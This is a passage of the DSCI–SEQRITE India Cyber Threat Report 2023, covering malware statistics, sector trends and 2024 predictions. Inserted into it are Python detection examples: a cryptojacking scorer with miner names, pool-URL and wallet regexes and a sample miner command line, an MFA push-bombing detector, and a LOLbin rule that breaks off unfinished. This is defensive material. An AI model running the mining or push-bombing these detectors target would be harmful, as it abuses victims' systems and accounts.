INDIA CYBER
THREAT REPORT
2023
Copyright ©2023
All rights reserved.
This report has been jointly developed by Data Security Council of India (DSCI) and SEQRITE.
The information contained herein has been obtained or derived from sources believed by DSCI and SEQRITE to be reliable. However, DSCI and SEQRITE disclaim all warranties as to the accuracy, completeness, or adequacy of such information. We shall bear no liability for errors, omissions or inadequacies in the information contained herein, or for interpretations thereof.
The information contained herein should not be relied upon as a substitute for specific professional advice. Professional advice should always be sought before taking any action based on the information provided.
The material in this publication is copyrighted. You may not distribute, modify, transmit, reuse, or use the contents of the report for public or commercial purposes, including the text, images, presentations, etc., without prior consent from DSCI and/or SEQRITE.
FOREWORD – DSCI
As India advances its digitalization efforts across sectors, a pervasive outbreak of cyberattacks has inflicted substantial financial losses on businesses. Cybersecurity has ascended to a strategic concern at the board level owing to the multifaceted nature of cyber threats and the escalating monetary repercussions stemming from data breaches. For the purpose of this report, DSCI in collaboration with SEQRITE analysed approximately 400 million malware detections from over 8.5 million SEQRITE endpoint installations in India. Our objective was to conduct a detailed study of India's cyber threat landscape and present our analysis very specific to the Indian context, covering the states, cities, and industry segments.

Malware stands as a significant peril to the integrity of digital systems, with cybercriminals engineering increasingly intricate and diverse attack methodologies. Every day, over half a million instances of malware are discovered, adding to the already staggering one billion circulating malware programs. As depicted in the report, there is a significant rise in behaviour-based detection compared to signature-based detection owing to the surge in constantly mutating malware variants such as polymorphic malware, zero-day exploits and fileless attacks. The report delves into the serious threats posed by ransomware attacks. It is evident from the analysis that the ransomware hit rate is higher compared to other malware categories, as ransomware detection is still evolving. The geographical analysis presents the top states and cities with the highest detections; however, it also underlines the fact that BYOD and work-from-home trends have brought Tier II/III cities into the ambit of cyberattacks. The digitization drive across industry segments is exposing traditional industries such as automobiles, manufacturing and healthcare to cyber threats.

The report meticulously delineates prominent classifications of malware and their consequential impacts, providing insights into both network and host-based exploitations, Android-specific detections and zero-day vulnerabilities pertinent to the Indian context. The featured stories in the report offer in-depth narratives on prevalent cyber threats. These narratives dissect cryptojacking exploits, anti-forensic activities, advanced persistent threats, and various malicious activities targeting specific sectors and technologies. The report concludes with a glimpse into the future, providing predictions and insights into cyber threats anticipated for 2024, empowering us to stay ahead in our security measures. It serves as a compass, guiding our actions and fortifying our cybersecurity posture.

VINAYAK GODSE
Chief Executive Officer,
Data Security Council of India
FOREWORD – QUICK HEAL
In line with the Hon'ble Prime Minister, Shri Narendra Modi's vision of a cyber-safe India, at SEQRITE, the enterprise cybersecurity arm of Quick Heal, we envision a future where cyber safety is not just a privilege but a fundamental right for all. It is with great pride and a sense of responsibility that I share with you deep insights derived from the country's largest malware analysis lab, SEQRITE Labs, in collaboration with Data Security Council of India (DSCI).

I thank the entire team at DSCI and the experts at our Labs for having researched and published threat intelligence for the Indian market. This report will dive deeply into the world of ever-evolving threats in the Indian context, and share predictions and recommendations for individuals, businesses and government organizations to stay a step ahead of prevalent risks during current and future times.

Backed by our patents and international certifications and a legacy of nearly three decades, our award-winning solutions are truly made-in-India for the world. I am confident that with our rigorous R&D efforts, focus on innovating future-ready technologies, and round-the-clock technical support, our solutions are capable of mitigating new and emerging threats.

Our commitment to securing India goes hand in hand with our dedication to innovation, thereby creating solutions that promise a sustainable future. The insights forged at our Labs form the cornerstone of our deep understanding of the evolving threat landscape. Recently, our team has patched two zero-day vulnerabilities and is the only cybersecurity solution provider the world over to have found a solution for the Expiro infector. In addition, we are the first and only Indian company to have been invited to collaborate with the Govt. of USA on NIST-NCCoE's Data Classification Project.

I take immense pride in our role as guardians of the critical infrastructure of our nation through our enterprise cybersecurity brand, SEQRITE. Safeguarding the digital backbone of our country is not just a responsibility; it's a commitment to ensuring the resilience of our nation in the face of evolving cyber threats.

As we navigate the ever-changing digital age, SEQRITE remains steadfast in its commitment to innovation, simplification, and securing all.

Sincerely,
DR. SANJAY KATKAR
Jt. Managing Director,
Quick Heal Technologies Limited
From CEO’s Desk – QUICK HEAL
India's rapidly growing digital ecosystem has proved to be a boon to its economy and is estimated to contribute over 20% to the country's GDP by 2026. However, with digital evolution, India has also emerged as the most targeted country in terms of cyberattacks, accounting for 13.7% of all attacks worldwide. Indian government agencies witnessed a 95% increase in cyberattacks in 2022, as compared to the previous year. Industries including healthcare, education, research, government, and military sectors have emerged as the most vulnerable, followed by agriculture, logistics, transportation, the energy industry at large, high-tech enterprises, pharmaceutical companies, and manufacturers of medical equipment.

Therefore, it is with great pleasure that we present to you this Threat Report, a collaborative effort between SEQRITE and DSCI, drawing on the invaluable insights from SEQRITE Labs, the country's largest Malware Analysis Lab, to equip businesses with India-centric knowledge and actionable recommendations to fortify their cybersecurity posture.

This report stands as a testament to the diligence and dedication of our researchers and experts, whose tireless efforts have allowed us to compile a comprehensive analysis of cyber threats in the Indian landscape. The wealth of data, statistics, and telemetry from approximately nine million endpoints forms the backbone of this report, providing a unique and detailed perspective on evolving cyber threats.

The report delves into the geographic and sectoral impact of cyber threats, shedding light on the top states, cities, and industries targeted throughout the year. From our analysis, it's evident that no region or sector is immune to the reach of these malicious attacks.

In addition, our commitment to ensuring holistic protection is reflected in the multiple layers of detection and protection mechanisms employed against sophisticated malware. Notably, on the Android front, we've observed a significant increase in Adware and Potentially Unwanted Applications (PUAs). Shockingly, fake and malicious applications, including SpyLoan and HidAdd apps hosted on the Google Play Store, have been downloaded by millions of unsuspecting users. Our researchers at SEQRITE Labs have identified numerous such malicious apps and got them removed from the Google Play Store.

Furthermore, the influence of geopolitical events, such as the Russia-Ukraine and Israel-Hamas conflicts, has cast a shadow on the global cybersecurity landscape. Despite India's diplomatic balancing act, our government and private entities have faced cyber threats from actors supposedly affiliated with the warring parties.

The report also uncovers cyberspace violations during significant social and national events, including the G20 summit hosted by India. Central and state government websites experienced DDoS attacks, defacements, and an overall surge in attacks aiming to tarnish the country's image during pivotal national and global occurrences.

We stand committed to simplifying cybersecurity for enterprises, government organizations and public sector entities by providing comprehensive and innovative solutions that are powered by state-of-the-art threat intelligence and playbooks, backed by world-class service provided by best-in-class security experts.

We extend our heartfelt gratitude to DSCI for their collaborative efforts and to the dedicated team at SEQRITE Labs for their unwavering commitment to creating excellence in cybersecurity. In light of this collective endeavor to safeguard our digital landscape, I sincerely hope that this report serves as a valuable resource for our common goal of creating a safe country and a safe world.

Sincerely,
VISHAL SALVI
Chief Executive Officer,
Quick Heal Technologies Limited
Contents

Executive Summary (p. 8)
Cybersecurity Outlook: Mapping the India Malware Landscape 2023 (p. 13)
The Anatomy of Threats (p. 17)
India Malware Landscape (p. 33)
    Geographical Analysis (p. 34)
    Sectoral Analysis (p. 36)
Featured Stories - 2023 (p. 41)
Cyber Threat Predictions for 2024 (p. 67)
Now to Next: Future Directions for CISOs (p. 73)
Executive Summary Cybersecurity Outlook Threat Anatomy Malware Landscape Featured Stories Threat Predictions Now to Next
INDIA CYBER THREAT REPORT 2023
8
Executive Summary
The DSCI-SEQRITE India Cyber Threat report
is instrumental in gaining a comprehensive
understanding of the current cybersecurity
landscape, particularly within the Indian context.
It offers valuable insights into emerging trends
related to threats, the activities of threat actors,
vulnerabilities and cybersecurity incidents.
The report integrates strategic and technical
components, making it accessible to both technical
and non-technical audiences. It goes beyond the
surface by identifying and elucidating the top
threats, delving into the specifics of threat actors’
motivations and attack techniques. Furthermore,
the report provides a thorough exploration of
specific sectors and geographies.
Key Highlights

> 400 million detections across ~8.5 million endpoints, averaging 761 detections per minute.
~49 million detections stem from behaviour-based analysis, constituting 12.5% of all detections.

Ransomware & Malware: Ransomware authors continually evolve their methodologies and employ sophisticated techniques to evade traditional signature-based detection. Ransomware incident ratio: ~1 per 650 detections. Malware incident ratio: ~1 per 38,000 detections.

Cryptojacking: Emerging as a significant threat with over 5 million detections in a year.

Attack Vectors: >50% of detections are associated with removable media and network drives; ~25% of attacks result from clicking on malicious links in emails and websites.

Mobile Threat Landscape: An average of ~3 attacks per Android device in a month.

Malware Attack Spectrum (Dominant Threats): 41% Trojans & 33% Infectors.

Top Three Industries: Automobile, Government, Education.

Geographical Hotspots: 15% Telangana & 14% Tamil Nadu.

City-wise Analysis: 15% Surat & 14% Bengaluru.
The report presents a comprehensive analysis of malware threats based on the data collected by SEQRITE Labs: 400 million malware detections across 8.5 million endpoints, averaging 761 detections every minute. The detections were examined under different subcategories, assessing the impact on various industry segments including government agencies. Additionally, the threat landscape across states and cities was explored, highlighting notable instances such as APTs in action, cryptojacking, ransomware attacks, the resurgence of old viruses, fake lending apps, and more.
2023 witnessed a pronounced increase in
global threat vectors, largely influenced
by significant geopolitical developments
worldwide, including Russia’s invasion
of Ukraine. Specifically, within India, the
G20 summit became a central stage for
geopolitical events, garnering substantial
attention regarding cyberattacks on
India’s digital infrastructure. During this
period, there was a marked increase in
both the frequency and sophistication
of cyber threats, contributing to the
proliferation of criminal activities such
as extortion, espionage, and frauds on a
broader scale.
Current anti-malware solutions face challenges with signature-based approaches, given the agility of malware creators in manipulating signatures. Behavioural analysis is the proactive approach that scrutinizes the behavioural patterns associated with potential threats, recognizing the deception tactics contemporary malware employs against traditional signature-based detection systems. Behaviour-based detection technologies accounted for over 12.5% of detections in 2023 (approximately 49 million instances).
Next-Generation Antivirus (NGAV) solutions are equipped with behaviour-based detection components to identify such advanced malware by its traits. Behaviour-based detection observes system activities to differentiate between normal and abnormal behaviour, thereby aiding the identification of potential threats. This approach utilizes Artificial Intelligence (AI) and Machine Learning (ML) to analyze large data sets and identify patterns that deviate from the norm, indicating potentially malicious activity.
Ransomware persistently holds its position as one of the most pernicious forms of cybercrime. In the data, one ransomware security incident emerges for every 650 detections, whereas a malware incident is considerably less frequent, materializing only once per 38,000 detections.
Crypto Miners and Cryptojacking: Cryptojacking is a prevalent stratagem in which an adversary deploys malicious crypto-mining software on an unsuspecting victim's device to mine cryptocurrency without their permission. Crypto miners are surfacing as a tenacious menace in the cyber threat panorama. They impact all significant computing systems and can remain undetected for an extended period of time, since they steal CPU cycles and power rather than data.

Despite the fluctuations in cryptocurrency values throughout 2023, the large-scale deployment of crypto miners can yield substantial financial gains for threat actors. Regardless of market shifts, cryptocurrency remains paramount. Crypto mining has evolved to be more resource-demanding and consequently more expensive, so attackers infiltrate multiple victims' environments to install miners and misappropriate the necessary computing resources.

The year also witnessed detections associated with CryptoNight, a proof-of-work mining algorithm used by certain cryptocurrencies such as Webchain and, before its move to RandomX, Monero. This included a surge in the usage of the Webchain miner and several XMRig-based miners. XMRig, a widely used open-source miner whose primary target is Monero (it does not mine Bitcoin), is currently one of the coin miners most abused by threat actors.
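As an added example (not code from the report or from SEQRITE Labs), the following Python scores running processes for the cryptojacking indicators just described: a known miner image name, XMRig-style command-line options, a stratum pool URL, a Monero-style wallet address in the arguments, and sustained CPU load. The process records are constructed; the option list and the scoring weights are assumptions chosen for the demo, not a published signature set.

```python
"""Score process records for cryptojacking indicators (added example).

Input records mimic `ps -eo pid,ppid,pcpu,comm,args`; in practice feed
EDR process telemetry. The sample at the bottom is constructed for the demo.
"""
import re
from dataclasses import dataclass, field

# Assumption: illustrative list of miner image names, not exhaustive.
MINER_NAMES = {"xmrig", "xmrig-notls", "minerd", "cpuminer", "nheqminer", "webchain-miner"}
# Assumption: a subset of XMRig's documented CLI options that rarely appear on
# benign software; `--threads` is left out because it is too generic.
MINER_FLAGS = {"--donate-level", "--algo", "--coin", "--rig-id", "--cpu-priority",
               "--randomx-1gb-pages", "--nicehash", "--keepalive"}
STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl)://[\w.\-]+:\d+", re.IGNORECASE)
# Monero primary addresses: 95 base58 chars starting with 4 (8 for subaddresses).
XMR_ADDR_RE = re.compile(r"\b[48][1-9A-HJ-NP-Za-km-z]{94}\b")
CPU_THRESHOLD = 80.0   # percent, sustained
SUSPECT_SCORE = 4      # at or above this the process is reported


@dataclass
class Proc:
    pid: int
    ppid: int
    comm: str        # image name as reported by the kernel
    args: str        # full command line
    cpu_pct: float   # sustained CPU usage


@dataclass
class Verdict:
    pid: int
    score: int = 0
    reasons: list = field(default_factory=list)


def score_process(p: Proc) -> Verdict:
    v = Verdict(pid=p.pid)
    argv = p.args.split()
    image = argv[0].rsplit("/", 1)[-1].lower() if argv else ""
    # A renamed binary defeats this check; the later checks still catch it.
    if p.comm.lower() in MINER_NAMES or image in MINER_NAMES:
        v.score += 4
        v.reasons.append("known miner image name")
    flags = {a.split("=", 1)[0] for a in argv if a.startswith("--")} & MINER_FLAGS
    if flags:
        v.score += 2 * len(flags)
        v.reasons.append("miner CLI flags: " + ", ".join(sorted(flags)))
    if STRATUM_RE.search(p.args):
        v.score += 3
        v.reasons.append("stratum pool URL on command line")
    if XMR_ADDR_RE.search(p.args):
        v.score += 3
        v.reasons.append("Monero wallet address on command line")
    if p.cpu_pct >= CPU_THRESHOLD:
        v.score += 1   # weak alone: builds, encoders and ML jobs also peg the CPU
        v.reasons.append(f"sustained CPU {p.cpu_pct:.0f}%")
    return v


def suspects(procs, threshold=SUSPECT_SCORE):
    """Verdicts for processes scoring at or above `threshold`, highest first."""
    hits = [v for v in map(score_process, procs) if v.score >= threshold]
    return sorted(hits, key=lambda v: -v.score)


# Constructed sample: a miner renamed to look like a kernel thread and dropped
# in a hidden path, a legitimate CPU-heavy ML job, a browser, and an XMRig that
# has only just started (no CPU yet). pool.example.* hosts are placeholders.
FAKE_XMR_ADDR = "4" + "A1b2" * 23 + "AB"   # 95 chars, passes the base58 shape check
SAMPLE_PROCS = [
    Proc(1412, 1, "kworkerds",
         "/tmp/.X11-unix/kworkerds -o stratum+tcp://pool.example.net:3333 "
         f"-u {FAKE_XMR_ADDR} --donate-level=1 --algo=rx/0 -k", 97.0),
    Proc(2200, 1, "python3", "python3 train.py --epochs 50", 95.0),
    Proc(3300, 1, "firefox", "/usr/lib/firefox/firefox", 12.0),
    Proc(4400, 2200, "xmrig", "./xmrig -o pool.example.org:5555 --coin monero", 0.0),
]

if __name__ == "__main__":
    for v in suspects(SAMPLE_PROCS):
        print(f"pid {v.pid} score {v.score}: {'; '.join(v.reasons)}")
```

The renamed miner (pid 1412) scores highest even though its image name is clean, because the command line carries the pool URL, the wallet and the XMRig options; the ML job scores only the CPU point and is not reported. In production, pair this host-side scoring with egress monitoring for stratum connections, since a miner started from a config file rather than the command line leaves nothing in `args`.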
Observations 2023
Industry Trends
Automotive Industry: Over the past three to four years, the global adoption of Industry 4.0 has marked a transformative trend, with extensive digitalization across industries. The automotive industry, once considered relatively secure, now faces escalating cyber threats. In 2023, a notable surge in cyber-attacks targeted the automotive sector, marking a shift from its earlier perceived safety. Supply chains within the automotive industry experienced the highest number of detections, surpassing government agencies and the education sector.
State-Backed Threats in India: India,
particularly vulnerable to state-backed
threat actors, witnessed an increased focus
on government agencies and defense
organizations.
Education Sector: The sector contends with
common threats such as phishing. Account
compromise, fuelled by high turnover,
is a prevailing challenge. W32.Neshta.C8
emerged as a significant threat within this
sector.
Power and Energy Sector: The critical
power and energy sector in India, pivotal
for economic growth, faces cyber threats
targeting diverse verticals, including supply
chain, cloud, legal, IT, and OT. The sector
continues to grapple with the risk of cyber
supply chain vulnerabilities, with the Expiro
infector variant being particularly prevalent.
Healthcare Sector: As India advances
in digitizing healthcare, securing online
systems becomes imperative. Nearly
60% of healthcare organizations in India
encountered cyberattacks in the past year,
with the Nimda variant posing a significant
threat.
Manufacturing Sector: Indian
manufacturing firms confront heightened
risks due to unsecured IoT devices in
their networks. The implementation
of 5G technology raises concerns
about exacerbating existing security
vulnerabilities. Ransomware attacks have
disrupted manufacturing operations,
especially impacting Small and Medium-
sized Enterprises (SMEs), while sophisticated
phishing attacks target SMEs within the
sector.
Logistics, Banking, and Financial
Sector: Beyond manufacturing, the
logistics, banking, and financial sectors are
susceptible to cyberattacks. The financial
sector’s digital transformation and the rise
of the platform economy have elevated
cyber threats on low-value transactions.
India has been a significant target for Advanced
Persistent Threats (APTs). Throughout 2023,
entities associated with various nations
consistently conducted computer network
operations, emphasizing the vital role these
operations play in fulfilling national objectives.
Adversaries have carried out a variety of
attacks, including destructive, espionage, and
information operations characterized by a
marked increase in the scope and scale of their
espionage activities.
The cybersecurity landscape has been
significantly influenced by the extensive
integration of Android devices, constituting
nearly 71% of the global market. The analysis
conducted, based on 500K installations, reveals
a discernible uptick in Adware and Potentially
Unwanted Applications (PUAs), highlighting
the persistent prominence of malware as a
significant threat. The data indicates an average
of 2-3 monthly attacks on Android mobiles,
posing a substantial risk to corporate networks,
especially considering the widespread utilization
of mobile devices for office work.
Predictions 2024

1. Ransomware continues to pose a significant threat to organizations, with the cost of attacks expected to rise. Key trends include increased targeting of critical infrastructure and the rise of Ransomware-as-a-Service (RaaS), which lowers entry barriers for cybercriminals. Double extortion tactics, where attackers both encrypt and steal victims' data, are also on the rise. The need for robust cybersecurity measures is underscored by the evolving threat landscape and the anticipated persistence of these threats.
2. AI-assisted malware such as the BlackMamba proof-of-concept poses a significant threat: it calls a large language model at runtime to synthesize its keylogging code, so each execution produces a unique payload and no static signature survives. As AI evolves, phishing tactics are expected to become more personalized and effective.
3. 'Living off the land' binaries like PowerShell and Certutil pose considerable risks, being abused to disable security measures and conduct malicious activities. The recent DarkGate malware and Cobalt Strike operators used these binaries to compromise systems, indicating a potential increase in such attacks in 2024.
4. Multi-Factor Authentication (MFA) fatigue attacks are a rising cybersecurity concern, where attackers who already hold a victim's password inundate them with repeated push-notification approval requests until one is accepted, granting access.

"As we move into this new era of AI-generated media, we must balance innovation with integrity and verify the source of all communication."
5. Looking ahead to 2024, AI-generated voice
and video scams are emerging as a significant
threat. These scams use advanced deep
learning techniques to imitate trusted
individuals, thus deceiving targets into
revealing sensitive information or taking
undesired actions.
6. Significant democratic events, such as
elections, inevitably draw the attention of
adversaries. The upcoming 2024 Indian
Elections are no exception and are poised to
witness a surge in cyberattacks, particularly in
the form of phishing emails and malvertising.
Artificial intelligence (AI) tools are increasingly
being leveraged to scale up such attacks,
making them more sophisticated and difficult
to detect.
7. Supply chain vulnerabilities are a growing concern in cybersecurity, leading to targeted attacks with widespread consequences. The rise in such attacks calls for new regulations and global collaboration between governments and private industries. Supply chains offer attackers the opportunity for one-to-many attacks, a trend expected to escalate in 2024.
8. Zero-day vulnerabilities are increasingly
being exploited by cybercriminals and state-
sponsored groups for persistent access
to networks. This allows them to operate
undetected, extract valuable information, and
demand higher ransoms. The trend is expected
to grow with a focus on exploiting cloud
infrastructure misconfigurations.
9. A concerning development in the
cybersecurity landscape is the growing
prevalence of the underground economy,
where corporate assets are auctioned,
and breach datasets are openly traded.
This surge is particularly evident in the
increased auctioning of corporate access
and the sale of breach datasets, driven by
escalating demand for services such as
penetration testing, zero-day exploits and
RaaS (Ransomware as a service) within the
underground market. Consequently, there
has been a notable rise in ransomware
infections and instances of unauthorized
access to sensitive networks, as acquired
access is actively traded in underground
forums.
10. Phishing attacks are increasing, often using
personal data from social media to gain
trust. As generative AI improves, it will be
used more in scams, including mimicking
voices. The dating app scams are also
expected to rise.
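The MFA fatigue pattern in prediction 4 above is detectable in identity-provider logs, because the attacker must generate the push prompts. The Python below is an added example, not code from the report or from any IdP vendor: it parses constructed authentication records (the `timestamp user event source_ip` format and the event names are assumptions standing in for an Okta, Microsoft Entra or Duo export), finds users who received more than a threshold of push prompts inside a short window, and rates the finding critical when the burst ends in an approval after repeated denials, which is the signature of a user who finally gave in.

```python
"""Flag MFA push-bombing ("MFA fatigue") in authentication logs (added example).

Log format, event names and all records below are constructed assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, NamedTuple

WINDOW = timedelta(minutes=10)   # look-back for counting prompts
PROMPT_THRESHOLD = 5             # prompts per user inside WINDOW that is abnormal


class AuthEvent(NamedTuple):
    ts: datetime
    user: str
    event: str      # push_sent | push_denied | push_approved | push_timeout
    ip: str


@dataclass
class Finding:
    user: str
    prompts: int
    denied: int
    approved: bool
    source_ips: List[str]
    severity: str


def parse(log_text: str) -> List[AuthEvent]:
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, user, event, ip = line.split()
        events.append(AuthEvent(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), user, event, ip))
    return sorted(events)


def detect_push_bombing(events, window=WINDOW, threshold=PROMPT_THRESHOLD):
    """One Finding per user whose push prompts reach `threshold` within `window`.

    Severity is 'critical' when the burst ends in an approval after denials:
    the attacker already had the password, and the user accepted to stop the noise.
    """
    by_user = defaultdict(list)
    for ev in events:
        by_user[ev.user].append(ev)
    findings = []
    for user, evs in by_user.items():
        sent = [e for e in evs if e.event == "push_sent"]
        for i in range(len(sent) - threshold + 1):
            start = sent[i].ts
            if sent[i + threshold - 1].ts - start > window:
                continue
            burst = [e for e in sent[i:] if e.ts - start <= window]
            tail = [e for e in evs if start <= e.ts <= burst[-1].ts + window]
            denied = sum(1 for e in tail if e.event == "push_denied")
            approved = any(e.event == "push_approved" for e in tail)
            findings.append(Finding(
                user=user, prompts=len(burst), denied=denied, approved=approved,
                source_ips=sorted({e.ip for e in burst}),
                severity="critical" if approved and denied else "high"))
            break   # report the first burst per user
    return findings


# Constructed sample: alice is bombed from one IP until she approves; bob logs in
# normally; carol has a couple of legitimate timeouts and retries.
SAMPLE_LOG = """\
2023-11-02T09:00:05Z alice push_sent 203.0.113.7
2023-11-02T09:00:20Z alice push_denied 203.0.113.7
2023-11-02T09:00:31Z alice push_sent 203.0.113.7
2023-11-02T09:00:45Z alice push_denied 203.0.113.7
2023-11-02T09:01:02Z alice push_sent 203.0.113.7
2023-11-02T09:01:15Z alice push_denied 203.0.113.7
2023-11-02T09:01:30Z alice push_sent 203.0.113.7
2023-11-02T09:01:44Z alice push_denied 203.0.113.7
2023-11-02T09:02:01Z alice push_sent 203.0.113.7
2023-11-02T09:02:13Z alice push_denied 203.0.113.7
2023-11-02T09:02:30Z alice push_sent 203.0.113.7
2023-11-02T09:02:41Z alice push_denied 203.0.113.7
2023-11-02T09:03:00Z alice push_sent 203.0.113.7
2023-11-02T09:03:25Z alice push_approved 203.0.113.7
2023-11-02T09:05:00Z bob push_sent 198.51.100.20
2023-11-02T09:05:12Z bob push_approved 198.51.100.20
2023-11-02T09:10:00Z carol push_sent 192.0.2.44
2023-11-02T09:11:00Z carol push_timeout 192.0.2.44
2023-11-02T09:11:05Z carol push_sent 192.0.2.44
2023-11-02T09:12:05Z carol push_timeout 192.0.2.44
2023-11-02T09:12:10Z carol push_sent 192.0.2.44
2023-11-02T09:12:30Z carol push_approved 192.0.2.44
"""

if __name__ == "__main__":
    for f in detect_push_bombing(parse(SAMPLE_LOG)):
        print(f"{f.severity.upper()}: {f.user} got {f.prompts} prompts from {f.source_ips}, "
              f"denied {f.denied}, approved={f.approved}")
```

A critical finding should trigger a session revocation and password reset for the user, not just a ticket. Preventively, number matching (the user must type a code shown on the login screen into the authenticator) and a per-user cap on push prompts per window remove the attacker's ability to generate the burst at all.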
Cybersecurity Outlook: Mapping the India Malware Landscape 2023
Malware Detection Overview

To arrive at the cyber threat landscape of India for the year 2023, a substantial 400 million instances of malware were observed across an extensive network of 8.5 million endpoints. Behavioural Detection (NGAV) played a pivotal role, contributing 49 million [1] of the total detections.

2023 TOTAL MALWARE DETECTIONS (chart): ~400M detections across 8.5 million endpoints; 12.5% behaviour-based detections, 87.5% signature-based detections.

[1] These detection capabilities were arrived at through SEQRITE's technologies, including Endpoint Security Server amongst others, to provide a comprehensive approach securing both on-premise and cloud environments.
Scan Wise Detections

Subcategory | Percentage of Detections | Inferences
Network Scans | 54.5% | Monitoring and safeguarding network traffic is vital.
Behavioural Detection | 12.5% | Behaviour-based analytics are effective for malware detection.
Real-Time Scans (RTS) | 12% | RTS promptly detects and neutralizes threats, ensuring swift response and ongoing protection.
Web Scans | 10% | Web scans proactively safeguard users and data by identifying and mitigating online threats.
Email Scans | 5% | Email remains a vector of concern, with a significant number of malware instances detected through email scanning.
On-Demand Scans | 3% | On-demand scans give users flexible, manual threat detection for added control and security.
Memory Scans | 3% | Adversaries are actively running threats in memory, so scanning memory is needed to catch them.
ENDPOINT ARCHITECTURE (diagram): EPS clients on the corporate network and on the roaming platform (users working from home or travelling) report alerts to the Endpoint Security Server; the admin sets rules and policies on the server, which pushes the rules out to the clients.
The Anatomy of Threats
Examining Malware Subtypes 2023

The section on malware subcategories elaborates on the current landscape of digital threats, sheds light on the prevalence of various malicious entities, and their potential impact on computer systems.

MALWARE SUBTYPES 2023 (DETECTIONS)*:
Trojan: 41%
Infector: 33%
Worm: 11%
PUA: 7%
Exploit: 5%
Alarming others (Cryptojacking, Adware, Ransomware): 3%

DISSECTING THE 7.53 MN DETECTIONS OF THE "ALARMING OTHERS" FAMILY:
Cryptojacking: 5.28 mn
Adware: 1.50 mn
Ransomware: 0.74 mn

*The reported count reflects Quick Heal installations and is based on data spanning from October 2022 to September 2023. Users are advised to consider the limited scope of this data for comprehensive insights.
Trojan (111.19 million): The prominence of Trojans highlights the sophistication of the deceptive tactics employed by cybercriminals. Users must exercise caution when downloading and installing software to avoid falling victim to such threats.
Robust endpoint security solutions are crucial to detecting and neutralizing Trojan attacks before they can compromise sensitive data.
Infector (91.40 million): Infectors pose a significant risk to the integrity of files and the overall health of computer systems.
Regular system scans and the use of reputable antivirus software are essential to identify and eradicate infections promptly. Additionally, user education on safe browsing practices can help prevent inadvertent execution of infected programs.
Worm (29.62 million): The self-replicating nature of worms
necessitates a proactive approach to network security.
Deploying firewalls, intrusion detection systems, and network segmentation
can limit the spread of worms and minimize the potential for widespread
damage.
PUA (Potentially Unwanted Application) (19.48 million): Potentially
Unwanted Applications may not be explicitly malicious, but their impact
on system performance and user experience can be detrimental.
Organizations should implement strict software controls and educate users
about the risks associated with downloading and installing applications
from untrusted sources.
Exploit (14.47 million): Exploits targeting software vulnerabilities demand constant vigilance in terms of software updates and patch management.
Timely application of security patches is critical to close potential entry points for exploit-based attacks.
Alarming Others (7.53 million): This category, comprising Cryptojacking, Adware, and Ransomware, represents a multifaceted threat landscape.
Cryptojacking (5.28 million): The prevalence of cryptojacking emphasizes the importance of monitoring system resources and utilizing endpoint security solutions capable of detecting and blocking unauthorized cryptocurrency mining activity.
Adware (1.50 million): Adware can be tackled by using ad blockers and security solutions capable of identifying and eliminating adware components.
Ransomware (0.74 million): Ransomware's potentially devastating impact on organizations reinforces the need for robust backup strategies, employee training on recognizing phishing attempts, and advanced endpoint protection to inhibit ransomware attacks.
Behaviour Based Detections
In the ever-evolving landscape of cybersecurity, the limitations of
conventional detection techniques have prompted the integration of
advanced methodologies to enhance the efficacy of anti-malware systems.
Traditional approaches, such as signature-based methods, excel in
identifying known malware patterns. However, their inherent limitation
lies in their inability to effectively detect unknown or polymorphic malware
strains that continuously mutate to evade signature recognition.
To address these challenges, machine learning methods are being
seamlessly integrated with existing detection mechanisms. While heuristic-
based methods offer a promising avenue for identifying new malware
variants, their susceptibility to high rates of false positives and false
negatives necessitates the development of more precise and adaptive
detection strategies. This imperative has led to the emergence of behaviour-
based detections, which focus on analyzing the dynamic actions and
patterns exhibited by potential threats, thereby offering a proactive and
comprehensive defense. This synergy of machine learning and behavioural
analysis marks a pivotal shift towards a more resilient and responsive
approach.
BEHAVIOUR-BASED DETECTIONS (chart): 2021: 5 mn; 2022: 13 mn; 2023: 49 mn.

In 2023, over 12.5% of detections (~49 million) are attributed to behaviour-based components. Behaviour-based detections have increased year on year, and as these technologies evolve they will become more potent against the latest malware. Conventional static file-based detection methods are constrained when faced with sophisticated malware using custom packers and obfuscation.
NGAV solutions are equipped with behaviour-based detection components to detect sophisticated malware based on its runtime characteristics.
Listed below are some of the malware variants detected by NGAV
which otherwise are difficult to detect with conventional methods.
Polymorphic Malware Variants: These malware variants are known for their ability to continually alter their characteristics to evade detection. Despite being derived from known malware families, their signatures are modified with each iteration, rendering them invisible to signature-based detection systems.
Code Obfuscation: A strategy used to evade detection and analysis. By making the code extremely hard to comprehend or even illegible, it can bypass tools that perform static analysis.
Fileless Attacks: These attacks employ macros, scripting engines and in-memory execution, utilize "living off the land" binaries, and leave minimal traces on the disk.
Zero-Day Attacks: These are novel or unidentified attacks that have not been recorded in signature databases yet and represent a significant challenge for traditional antivirus solutions.
LOLbins or Living Off the Land Binaries: LOLbins are non-malicious system tools that cyber criminals can exploit to hide their malicious activities. They can execute code, perform file operations, steal passwords, and bypass detection. Often, these are Microsoft-signed binaries like Certutil and WMIC. LOLbins are challenging to detect and terminate because they are local, trusted processes. Even when detected, they can only be terminated, not quarantined, which leaves the system vulnerable to further attacks until the parent process that initiated the malicious operation is terminated. The only effective countermeasure is to detect them during malicious activity, terminate the process immediately, and quarantine the parent process or program. This can be achieved through deployment of NGAV solutions.
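As an added example (not code from the report or from any NGAV product), the response described in the LOLbins passage written as a behaviour rule over process-creation telemetry: the certutil/wmic child is terminated and its parent quarantined when the parent is one that should not be launching it. The event fields and the parent allowlists are assumptions.

```python
"""Behaviour-based rule for LOLbin abuse over process-creation events.

Added example, not code from the report or from any NGAV product. The event
fields and the parent-process allowlists are assumptions for illustration.
"""
from dataclasses import dataclass
from typing import List, Optional

# Microsoft-signed binaries the report names as commonly abused LOLbins
LOLBINS = {"certutil.exe", "wmic.exe"}

# Parents from which these tools are expected during normal administration (assumed)
EXPECTED_PARENTS = {"cmd.exe", "powershell.exe", "explorer.exe", "services.exe", "mmc.exe"}

# Parents that have no business launching them: document, mail and script hosts (assumed)
HIGH_RISK_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "acrord32.exe",
                     "wscript.exe", "mshta.exe"}


@dataclass
class ProcessEvent:
    pid: int
    image: str          # child image name, e.g. "certutil.exe"
    ppid: int
    parent_image: str   # image name of the process that spawned it


@dataclass
class Verdict:
    pid: int
    action: str                         # "allow" or "terminate+quarantine_parent"
    reason: str
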